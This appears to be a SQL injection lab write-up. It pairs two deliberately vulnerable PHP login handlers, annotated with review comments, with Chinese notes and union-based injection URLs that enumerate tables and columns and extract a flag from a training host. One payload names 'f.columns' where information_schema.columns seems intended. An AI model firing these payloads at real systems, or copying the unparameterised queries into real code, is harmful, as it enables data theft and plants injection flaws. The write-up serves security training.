// Lab handler: looks up rows of `user` by the `id` query parameter and prints
// the login name and password columns of the row it ends up holding.
$username = '';
$password = '';

// `id` is taken straight from the query string; it is null when absent.
$id = isset($_GET['id']) ? $_GET['id'] : null;

// NOTE(review): $id is appended to the statement unquoted and unvalidated, so
// the request supplies SQL syntax rather than just a value (SQL injection).
// This is the flaw the lab is built around. In real code, bind the value with
// mysqli_prepare() / mysqli_stmt_bind_param() and, for a numeric key, reject
// anything that is not an integer before it reaches the query.
// The @ only hides PHP notices (e.g. an array-valued `id`); it validates nothing.
@$sql = 'select *from user where id=' . $id;

// Database name withheld by the author.
mysqli_select_db($conn, '****');
$result = mysqli_query($conn, $sql);

// Every fetched row overwrites the previous one, so the last row returned is
// the one that gets printed.
while ($row = mysqli_fetch_array($result)) {
    $username = $row['username'];
    $password = $row['password'];
}

// NOTE(review): column values are echoed without htmlspecialchars(), and the
// password column is shown as-is, which suggests it is stored unhashed.
// Production code should store only password_hash() output and never echo it.
echo 'Your Login name:', $username;
echo 'Your Password:', $password;
显错注入：先判断查询返回多少个字段（union 查询要求两侧列数一致）
查表拓展: 1 and exists(select * from user)这种形式可以猜解表是否存在
http://inject2.lab.aqlab.cn:81/Pass-01/index.php?id=1 union all select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database();
查flag表中字段
http://inject2.lab.aqlab.cn:81/Pass-01/index.php?id=1 union all select 1,2,group_concat(column_name) from f.columns where table_schema=database() and table_name=0x6572726f725f666c6167; //0x6572726f725f666c6167是error_flag的十六进制
拿flag //后面就不截图了
http://inject2.lab.aqlab.cn:81/Pass-01/index.php?id=1 union all select 1,2,flag from error_flag;
pass-02
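// Lab handler (string-quoted variant): looks up rows of `user` by the `id`
// query parameter and prints the login name and password columns of the row
// it ends up holding.
$username = '';
$password = '';

// `id` is taken straight from the query string; it is null when absent.
$id = isset($_GET['id']) ? $_GET['id'] : null;

// The quote escapes in the listing were garbled ('\'' is not valid PHP); the
// statement built here is: select *from user where id='<id>'
//
// NOTE(review): wrapping $id in single quotes is not a defence. Nothing escapes
// quote characters inside the value, so it can still close the literal and
// change the statement (SQL injection). This is the flaw the lab is built
// around. In real code, bind the value with mysqli_prepare() /
// mysqli_stmt_bind_param() instead of concatenating it.
// The @ only hides PHP notices (e.g. an array-valued `id`); it validates nothing.
@$sql = 'select *from user where id=\'' . $id . '\'';

// Database name withheld by the author.
mysqli_select_db($conn, '****');
$result = mysqli_query($conn, $sql);

// Every fetched row overwrites the previous one, so the last row returned is
// the one that gets printed.
while ($row = mysqli_fetch_array($result)) {
    $username = $row['username'];
    $password = $row['password'];
}

// NOTE(review): column values are echoed without htmlspecialchars(), and the
// password column is shown as-is, which suggests it is stored unhashed.
// Production code should store only password_hash() output and never echo it.
echo 'Your Login name:', $username;
echo 'Your Password:', $password;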